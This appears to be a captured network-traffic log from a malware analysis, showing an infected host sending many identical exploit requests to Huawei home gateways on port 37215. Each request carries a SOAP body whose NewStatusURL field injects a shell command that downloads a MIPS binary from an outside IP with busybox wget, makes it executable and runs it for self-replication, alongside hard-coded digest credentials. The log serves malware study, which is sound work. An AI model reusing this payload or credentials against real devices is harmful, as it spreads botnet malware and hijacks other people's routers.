                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  114192.168.2.1351246197.212.50.1437215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.062517881 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  115192.168.2.1360432157.65.200.9037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.062560081 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  116192.168.2.134341441.62.222.11937215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.062700987 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  117192.168.2.1346826197.187.212.18837215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.062702894 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  118192.168.2.1357564157.53.215.8237215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.062702894 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  119192.168.2.1340648197.254.110.7237215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.062711000 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  120192.168.2.1357540159.139.137.037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.062736988 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  121192.168.2.134494041.10.145.14137215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.062741041 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  122192.168.2.134604484.204.138.2237215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.062747955 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  123192.168.2.1354030150.179.12.11637215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.062747955 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 